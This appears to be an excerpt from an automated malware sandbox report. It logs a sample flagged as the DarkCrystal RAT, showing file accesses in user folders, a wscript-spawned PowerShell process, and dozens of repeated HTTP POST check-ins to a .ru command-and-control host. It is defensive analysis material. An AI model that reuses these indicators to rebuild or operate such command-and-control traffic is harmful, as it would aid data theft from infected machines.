                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\Local

                                    Software Vulnerabilities

                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 104.21.38.84:80
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 048038cm.renyash.ru Content-Length: 225372 Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2060Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2576Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 048038cm.renyash.ru
Content-Length: 2076
Expect: 100-continue

Source: global traffic
HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 048038cm.renyash.ru
Content-Length: 2580
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 048038cm.renyash.ru
Content-Length: 2060
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 048038cm.renyash.ru
Content-Length: 2088
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 048038cm.renyash.ru
Content-Length: 2576
Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic | DNS traffic detected: DNS query: 048038cm.renyash.ru
